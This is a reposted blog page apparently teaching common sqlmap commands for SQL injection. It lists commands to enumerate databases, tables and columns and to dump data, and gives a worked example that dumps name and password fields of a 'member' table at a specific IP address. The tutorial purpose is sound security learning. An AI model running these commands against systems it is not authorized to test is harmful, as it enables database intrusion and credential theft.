当前位置:网站首页>sqlmap injection tutorial common commands
sqlmap injection tutorial common commands
2022-07-31 05:53:00 【not used to having you】
sqlmap injection tutorial common commands
sqlmap official website: sqlmap: automatic SQL injection and database takeover tool
sqlmap documentation address: https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh help manual in detailHighlights
sqlmap.py -u "Injection Address" --dbs // List databases
sqlmap.py -u "Injection Address" --current-db // Current database
sqlmap.py -u "injection address" --users // column database user
sqlmap.py -u "injection address" --current-user // current user
sqlmap.py -u "injection address" --tables -D ""Database" // List the table name of the database
sqlmap.py -u "Injection address" --columns -T "Table name" -D "Database" // Get the column name of the table
sqlmap.py -u"Injection address" --dump -C "Column name" -T "Table name" -D "Database" //Get the column information of the following table in the databaseIt is best to add --level 3 --risk2 after the command, which can increase the depth and speed of scanning
--delay=1 means to send one packet per second
For example:
sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1" --dbs //Explosive library
sqlmap.py -u"http://219.153.49.228:44109/new_list.php?id=1" -D stormgroup --tables //burst table
sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns burst list
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member-C name,password --dump burst field value
Respect originality:
Loaded at: https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html
边栏推荐
- 2021 Mianjing - Embrace Change
- How to distinguish big and small endian in C language
- uni-app进阶之内嵌应用【day14】
- C language tutorial (1) - preparation
- 数字取证autopsy工具用法
- 了解SSRF,这一篇就足够了
- leetcode-1833. 雪糕的最大数量(排序+贪心)
- 【uiautomation】微信好友列表获取(存储到txt中)
- 工件SSMwar exploded 部署工件时出错。请参阅服务器日志了解详细信息
- Sword Point Offer Special Assault Edition ---- Day 1
猜你喜欢

Install mysqldb in mac10.14

leetcode-1833. 雪糕的最大数量(排序+贪心)

常见JVM面试题及答案整理

Error: Cannot find module 'D:\Application\nodejs\node_modules\npm\bin\npm-cli.js'

Error: Cannot find module ‘D:\Application\nodejs\node_modules\npm\bin\npm-cli.js‘

vulhub靶场学习日记SickOs1.2

12 【网页布局总结 元素的显示与隐藏】

为什么redis是单线程还那么快?

【云原生】原来2020.0.X版本开始的OpenFeign底层不再使用Ribbon了

leetcode-每日一题873. 最长的斐波那契子序列的长度(哈希和二分)
随机推荐
Year-end summary - the years are quiet~
mac10.14中安装mysqldb
闭包(五)----一个常见的循环
uni-app进阶之自定义【day13】
Redis:简单实用
【JVM加载】---类加载机制
NFT与数字藏品到底有何区别?
The process and specific code of sending SMS verification code using flask framework
wpf wrapPanel居中并从左到右排列
Why is the redis single-threaded also so fast?
wpf ScrowViewer水平滚动
10 【组件编码流程 组件自定义事件 全局事件总线】
常见JVM面试题及答案整理
【数据库学习】Redis 解析器&&单线程&&模型
File operations in C language (1)
leetcode-每日一题剑指 Offer II 041. 滑动窗口的平均值(队列模拟)
闭包(三)----执行环境
NFTs: The Heart of Digital Ownership
C language tutorial (3) - if and loop
字符串的扩展